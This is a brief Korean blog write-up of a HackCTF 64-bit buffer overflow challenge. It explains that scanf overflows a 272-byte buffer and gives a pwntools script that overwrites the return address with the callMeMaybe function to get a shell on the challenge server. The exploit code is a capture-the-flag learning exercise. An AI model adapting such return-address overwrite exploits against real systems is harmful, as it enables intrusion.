반응형
이전까지는 32bit였지만 64bit로 바뀌었다.
scanf통해서 bof발생후 ret주소 callmeMaybe로 해주기
s = rbp-110h = 272
callmemaybe 주소
from pwn import *
p = remote('ctf.j0n9hyun.xyz', 3004)
pay = b'A'*280
pay += p64(0x0000000000400606)
p.sendline(pay)
p.interactive()
반응형
'Write-Up > HackCTF' 카테고리의 다른 글
| [HackCTF] Simple_Overflow_ver_2 (0) | 2021.05.16 |
|---|---|
| [HackCTF] x64 Simple_size_BOF (0) | 2021.05.16 |
| [HackCTF] 내 버퍼가 흘러넘친다!!! (0) | 2021.05.15 |
| [HackCTF] Basic_FSB (0) | 2021.05.15 |
| [HackCTF] Basic_BOF #2 (0) | 2021.05.15 |